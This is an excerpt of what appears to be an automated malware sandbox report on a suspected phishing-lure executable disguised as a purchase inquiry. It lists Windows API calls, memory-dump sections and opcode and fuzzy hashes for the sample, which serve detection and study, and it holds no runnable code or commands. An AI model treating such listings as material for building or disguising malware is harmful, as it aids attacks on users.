                                                                    • Associated: 00000000.00000002.106938656716.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938943446.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.jbxd
                                                                    Similarity
                                                                    • API ID: CreateDirectoryErrorLast
                                                                    • String ID:
                                                                    • API String ID: 1375471231-0
                                                                    • Opcode ID: d8dd424ede50ccfac4b7523ad15fca3fe61b3a2743ebd4ec855a49df1000c641
                                                                    • Instruction ID: fb2ec3850198e6a3c32e9ec6a0d6f7e4a8645a4513041e6eac74538e2b64e397
                                                                    • Opcode Fuzzy Hash: d8dd424ede50ccfac4b7523ad15fca3fe61b3a2743ebd4ec855a49df1000c641
                                                                    • Instruction Fuzzy Hash: 51C04C30A18642DBD6505B20ED087177950AB50741F60CD35610BF11A0D6759811DD3E
                                                                    APIs
                                                                    • SetFilePointer.KERNELBASE(00000000,?,00000000,00000002,?,?), ref: 004027A0
                                                                      • Part of subcall function 00405F61: wsprintfW.USER32 ref: 00405F6E
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.106938484188.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.106938375986.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938587560.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938943446.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.jbxd
                                                                    Similarity
                                                                    • API ID: FilePointerwsprintf
                                                                    • String ID:
                                                                    • API String ID: 327478801-0
                                                                    • Opcode ID: 390f2af81ab463b3cbd4013dd9a57b5a130c00408a04b447ab1cf3b55cc0eeb8
                                                                    • Instruction ID: 1be42fce3669e14aef02856632b8c3fd6eb27c701acbe6074d6f00ab1ddd0ca8
                                                                    • Opcode Fuzzy Hash: 390f2af81ab463b3cbd4013dd9a57b5a130c00408a04b447ab1cf3b55cc0eeb8
                                                                    • Instruction Fuzzy Hash: 30E04F71B05515EBDB11AFA59E4ADAF776AEB40329B14043BF101F00E1C67D8C419A3E
                                                                    APIs
                                                                    • WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 004022D4
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.106938484188.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.106938375986.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938587560.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938943446.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.jbxd
                                                                    Similarity
                                                                    • API ID: PrivateProfileStringWrite
                                                                    • String ID:
                                                                    • API String ID: 390214022-0
                                                                    • Opcode ID: 981c7979ba822dccdb72df52fcfe6b7f87be0c37e1a4f4794e53a06bb608896e
                                                                    • Instruction ID: 149acb2e4c8d2ab334bf79ea3f96ce17df26442c265e53a7283cdf21b2f65ea8
                                                                    • Opcode Fuzzy Hash: 981c7979ba822dccdb72df52fcfe6b7f87be0c37e1a4f4794e53a06bb608896e
                                                                    • Instruction Fuzzy Hash: B3E04F319001246ADB113EF10E8ED7F31695B40314B1405BFB511B66C6D5FC1D4146A9
                                                                    APIs
                                                                    • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,0040321F,00000000,00000000,00403076,000000FF,00000004,00000000,00000000,00000000), ref: 00405C86
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.106938484188.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.106938375986.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938587560.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938943446.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.jbxd
                                                                    Similarity
                                                                    • API ID: FileRead
                                                                    • String ID:
                                                                    • API String ID: 2738559852-0
                                                                    • Opcode ID: a00b84ef068ec3340bdddd9f42ca8c04165d68640cb73732be2406276cbef438
                                                                    • Instruction ID: ef4ecac980915e2f81eec60b371ea7b66f7146230b2cbae24b16510ac7dd1765
                                                                    • Opcode Fuzzy Hash: a00b84ef068ec3340bdddd9f42ca8c04165d68640cb73732be2406276cbef438
                                                                    • Instruction Fuzzy Hash: 53E0EC3265835AABEF109E659C08AEB7B6CEB05360F004432F915E6190D271E8219BA5
                                                                    APIs
                                                                    • RegOpenKeyExW.KERNELBASE(00000000,0000023F,00000000,00000022,00000000,?,?), ref: 00402CF1
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.106938484188.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.106938375986.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938587560.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938943446.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.jbxd
                                                                    Similarity
                                                                    • API ID: Open
                                                                    • String ID:
                                                                    • API String ID: 71445658-0
                                                                    • Opcode ID: 47bb742b83de058295ea66ad7c8c51c1fc329d8dacee4bb1f88cf71d1c5c0238
                                                                    • Instruction ID: 2fd216668262c1d23633d06d3759517c993b1d1f21998de780648112abb91376
                                                                    • Opcode Fuzzy Hash: 47bb742b83de058295ea66ad7c8c51c1fc329d8dacee4bb1f88cf71d1c5c0238
                                                                    • Instruction Fuzzy Hash: 64E08676244108BFDB00DFA4DD47FD577ECEB44700F004421BA08D7091C774E5408768
                                                                    APIs
                                                                    • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,004031ED,00000000,0040BEA0,?,0040BEA0,?,000000FF,00000004,00000000), ref: 00405CB5
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.106938484188.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.106938375986.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938587560.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938943446.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.jbxd
                                                                    Similarity
                                                                    • API ID: FileWrite
                                                                    • String ID:
                                                                    • API String ID: 3934441357-0
                                                                    • Opcode ID: 00c0377323aa53eb430c82b83f01e62a2601c7c92c94a0140a128221a0f71a88
                                                                    • Instruction ID: ba43a9b4bceeecaa6f2f3e0d34fbf098cac3b3b9582c4b6c2afca3054f4c0e18
                                                                    • Opcode Fuzzy Hash: 00c0377323aa53eb430c82b83f01e62a2601c7c92c94a0140a128221a0f71a88
                                                                    • Instruction Fuzzy Hash: 53E08632114319ABDF105E509C40EEB3B6CEB00350F004432F915E3180D231F8219BA4
                                                                    APIs
                                                                    • VirtualProtect.KERNELBASE(1000405C,00000004,00000040,1000404C), ref: 100027E5
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.106959059885.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.106959018081.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106959096492.0000000010003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106959124482.0000000010005000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.jbxd
                                                                    Similarity
                                                                    • API ID: ProtectVirtual
                                                                    • String ID:
                                                                    • API String ID: 544645111-0
                                                                    • Opcode ID: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
                                                                    • Instruction ID: 0f6967942ea94a3d6c88e3f350f968197b77ea31d8e69eb9713f4ef8856af232
                                                                    • Opcode Fuzzy Hash: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
                                                                    • Instruction Fuzzy Hash: 47F0A5F15057A0DEF350DF688C847063BE4E3483C4B03852AE3A8F6269EB344454CF19
                                                                    APIs
                                                                    • GetPrivateProfileStringW.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 00402310
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.106938484188.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.106938375986.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938587560.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938943446.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.jbxd
                                                                    Similarity
                                                                    • API ID: PrivateProfileString
                                                                    • String ID:
                                                                    • API String ID: 1096422788-0
                                                                    • Opcode ID: e95e7b58a01c094ed04e695a4ca6ba6fac99f72604aa6d91b41b78e2544a399b
                                                                    • Instruction ID: 8b162ba546b3877e829776e4b8c3d619a2c74ac71086561365c339888b8acfb9
                                                                    • Opcode Fuzzy Hash: e95e7b58a01c094ed04e695a4ca6ba6fac99f72604aa6d91b41b78e2544a399b
                                                                    • Instruction Fuzzy Hash: 61E04F30800204BBDF01AFA4CE49DBD3B79AB00344F14043AF900AB1D5E7F89A809749
                                                                    APIs
                                                                    • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402FB5,?,?,?,"C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exe",00403500,?), ref: 00403230
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.106938484188.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.106938375986.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938587560.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938943446.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.jbxd
                                                                    Similarity
                                                                    • API ID: FilePointer
                                                                    • String ID:
                                                                    • API String ID: 973152223-0
                                                                    • Opcode ID: 500ff757afade42e276d5337a77ed9e8e494b853a2931491cde3850712262a81
                                                                    • Instruction ID: 0576ba63ef0ea8b46fce932fbf196e130763cebcf3e43c4cce3b0366b0281484
                                                                    • Opcode Fuzzy Hash: 500ff757afade42e276d5337a77ed9e8e494b853a2931491cde3850712262a81
                                                                    • Instruction Fuzzy Hash: 64B01231584200BFDB214F00DE05F057B21A790700F10C030B304780F082712460EB0D
                                                                    APIs
                                                                    • KiUserCallbackDispatcher.NTDLL(?,00403ED8), ref: 0040410A
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.106938484188.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.106938375986.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938587560.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938943446.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.jbxd
                                                                    Similarity
                                                                    • API ID: CallbackDispatcherUser
                                                                    • String ID:
                                                                    • API String ID: 2492992576-0
                                                                    • Opcode ID: 52bdda195f1be107111d33c53c23f47bc3bdbd5ca81d52a4b6bb6385c1bcbce2
                                                                    • Instruction ID: 8b53a25d375a508ca0f68064fdc939b5f25de369c98bd294fc40859475f67141
                                                                    • Opcode Fuzzy Hash: 52bdda195f1be107111d33c53c23f47bc3bdbd5ca81d52a4b6bb6385c1bcbce2
                                                                    • Instruction Fuzzy Hash: 02A01132808000ABCA028BA0EF08C0ABB22BBB8300B008A3AB2008003082320820EB0A
                                                                    APIs
                                                                    • Sleep.KERNELBASE(00000000), ref: 004014E6
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.106938484188.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.106938375986.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938587560.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938943446.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.jbxd
                                                                    Similarity
                                                                    • API ID: Sleep
                                                                    • String ID:
                                                                    • API String ID: 3472027048-0
                                                                    • Opcode ID: 0d908656d3c24c15d4d4f6c0f7b1f65d8079eb8882620cc147371b58e0d702b3
                                                                    • Instruction ID: 88d0a792f92477889319fa728d86d3a4b1a3b5a0b34bdf851579dde41f73a245
                                                                    • Opcode Fuzzy Hash: 0d908656d3c24c15d4d4f6c0f7b1f65d8079eb8882620cc147371b58e0d702b3
                                                                    • Instruction Fuzzy Hash: 15D0C977B141009BD760EFB9AE898AB73A8EB913293204833D912E10A2D578D802963D
                                                                    APIs
                                                                    • GetDlgItem.USER32(?,000003F9), ref: 00404B0D
                                                                    • GetDlgItem.USER32(?,00000408), ref: 00404B18
                                                                    • GlobalAlloc.KERNEL32(00000040,?), ref: 00404B62
                                                                    • LoadBitmapW.USER32(0000006E), ref: 00404B75
                                                                    • SetWindowLongW.USER32(?,000000FC,004050ED), ref: 00404B8E
                                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404BA2
                                                                    • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404BB4
                                                                    • SendMessageW.USER32(?,00001109,00000002), ref: 00404BCA
                                                                    • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404BD6
                                                                    • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404BE8
                                                                    • DeleteObject.GDI32(00000000), ref: 00404BEB
                                                                    • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404C16
                                                                    • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404C22
                                                                    • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404CB8
                                                                    • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404CE3
                                                                    • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404CF7
                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00404D26
                                                                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404D34
                                                                    • ShowWindow.USER32(?,00000005), ref: 00404D45
                                                                    • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404E42
                                                                    • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404EA7
                                                                    • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404EBC
                                                                    • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404EE0
                                                                    • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404F00
                                                                    • ImageList_Destroy.COMCTL32(?), ref: 00404F15
                                                                    • GlobalFree.KERNEL32(?), ref: 00404F25
                                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404F9E
                                                                    • SendMessageW.USER32(?,00001102,?,?), ref: 00405047
                                                                    • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00405056
                                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 00405076
                                                                    • ShowWindow.USER32(?,00000000), ref: 004050C4
                                                                    • GetDlgItem.USER32(?,000003FE), ref: 004050CF
                                                                    • ShowWindow.USER32(00000000), ref: 004050D6
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.106938484188.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.106938375986.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938587560.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938943446.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                    • String ID: $M$N
                                                                    • API String ID: 1638840714-813528018
                                                                    • Opcode ID: 04f3f42b2e655a6bf1bbe546ad9d96aad2a2205ad87ede7fab540f4b471b76d2
                                                                    • Instruction ID: 2f8963ba0b06e8e3d6cb077b811a33c65d2f4829f178f5176880c359a33aa38b
                                                                    • Opcode Fuzzy Hash: 04f3f42b2e655a6bf1bbe546ad9d96aad2a2205ad87ede7fab540f4b471b76d2
                                                                    • Instruction Fuzzy Hash: 1D026FB0A00209EFDB249F54DD45AAE7BB5FB84314F10857AF610BA2E1C7799D42CF58
                                                                    APIs
                                                                    • GetDlgItem.USER32(?,000003FB), ref: 004045C8
                                                                    • SetWindowTextW.USER32(00000000,?), ref: 004045F2
                                                                    • SHBrowseForFolderW.SHELL32(?), ref: 004046A3
                                                                    • CoTaskMemFree.OLE32(00000000), ref: 004046AE
                                                                    • lstrcmpiW.KERNEL32(Call,004226E8,00000000,?,?), ref: 004046E0
                                                                    • lstrcatW.KERNEL32(?,Call), ref: 004046EC
                                                                    • SetDlgItemTextW.USER32(?,000003FB,?), ref: 004046FE
                                                                      • Part of subcall function 00405743: GetDlgItemTextW.USER32(?,?,00000400,00404735), ref: 00405756
